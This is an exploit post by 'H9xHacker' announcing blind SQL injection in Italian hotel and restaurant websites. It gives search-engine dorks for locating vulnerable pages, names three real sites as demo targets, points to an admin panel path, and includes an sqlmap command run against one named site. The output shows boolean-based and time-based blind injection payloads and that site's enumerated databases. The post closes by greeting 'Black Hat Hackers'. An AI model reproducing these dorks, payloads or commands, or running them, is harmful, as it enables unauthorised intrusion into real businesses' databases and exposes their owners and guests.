# Exploit Title:Italian Hotels Blind SQL Injection vulnerability
# Date:30/11/2019
# Dork: inurl:camere-dettaglio.php?id= site:.it
inurl:restaurant-news-detail.php?id= site:.it
inurl:rooms-suites.php?id= site:.it
inurl:room.php?id= site:.it
inurl:rooms-suites.php?id= site:.it
# Exploit Author:H9xHacker
# Tested on:Linux
Reverse check bing.com
ip:151.11.51.124 .php?id= (There are 202 domains hosted on this server.)
# Demo
ristorantelaspada.it/en/restaurant-news-detail.php?id=32
lungarnovespucci50.com/en/camere-dettaglio.php?id=9
hotelbeyfin.com/de/rooms-suites.php?id=27
# Admin control panel path
http://www.website.com/cms-admin/
OR
http://www.website.it/cms-admin/
# Poc:
sqlmap --level=5 --risk=3 --timeout=10 --threads=10 --random-agent -u 'http://ristorantelaspada.it/en/restaurant-news-detail.php?id=32' --no-cast --batch --dbs
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=32' AND 2568=2568-- AtOc
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
Payload: id=32' OR (SELECT 9574 FROM (SELECT(SLEEP(5)))kdFW)-- xPIg
---
web application technology: Apache, PHP
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] information_schema
[*] ristorantelaspada_it_01
------------------------
Greets:Black Hat Hackers